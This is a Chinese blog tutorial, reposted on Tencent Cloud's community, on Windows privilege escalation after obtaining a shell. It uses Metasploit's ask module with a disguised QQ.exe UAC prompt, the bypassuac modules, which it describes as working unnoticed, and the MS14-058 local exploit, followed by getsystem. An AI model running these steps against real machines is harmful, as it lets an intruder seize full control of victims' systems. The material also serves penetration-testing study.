前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >KALI拿到shell后提权操作

KALI拿到shell后提权操作

作者头像
院长技术
发布2020-08-19 15:34:13
1.7K0
发布2020-08-19 15:34:13
举报
文章被收录于专栏:院长运维开发

利用KALI 进行程序提权操作


UAC Exploit/windows/local/ask 模块提权

介绍: 使用: Exploit/windows/local/ask 该命令会在目标机器上弹出需要来自管理员权限的对话框,对方点击‘是’则可将程序权限提至最高级别并未绕过UAC 1.拿到session后将session放入后台 2.执行 use exploit windows/local/ask 使用ask模块 3.在ask模块中首先设置你的session会话的ID

代码语言:javascript
复制
set session id

4.ask模块中也可以设置弹出框的名字表示哪个应用需要来自管理员权限

代码语言:javascript
复制
set filename QQ.exe

5.其他的无需设置直接发起攻击exploit 目标情况:

1.jpg
1.jpg

如过对方选择“是” 那么会生成一个新的session对话 如果 对方选择“否”那么该攻击会在一段时间显示超时

进入到新创建的会话中后我们再次执行getsystem命令进行提权

UAC绕过来提权

上面的提权操作附有交互性,对于警惕性很高的人来说一般不会轻易的点击"是" 下面我们使用一种在对方不知不觉的情况下进行UAC绕过来进行权限的提升。 模块:

代码语言:javascript
复制
Exploit/windows/local/bypassuac             
Exploit/windows/local/bypassuac_injection
Exploit/windows/local/bypassuac_vbs

我们使用bypassuac模块进行提权 1.同上面第一步操作 2.执行 use exploit/windows/local/bypassuac”进 使用bypassuac模块 3.设置你的session会话的ID

代码语言:javascript
复制
set session id

4.直接发起攻击exploit 5.进入新建的session中执行getsystem进行提权

2.jpg
2.jpg

利用提权漏洞进行提权

模块:Exploit/windows/local/ms14_058_track_popup_menu 1.执行 use exploit/windows/local/ms14_058_track_popup_menu 2.set session id 3.执行 exploit即可提升权限本地漏洞提权 注:该漏洞适用于x86机器

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 利用KALI 进行程序提权操作
  • UAC Exploit/windows/local/ask 模块提权
  • 进入到新创建的会话中后我们再次执行getsystem命令进行提权
    • UAC绕过来提权
      • 利用提权漏洞进行提权
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档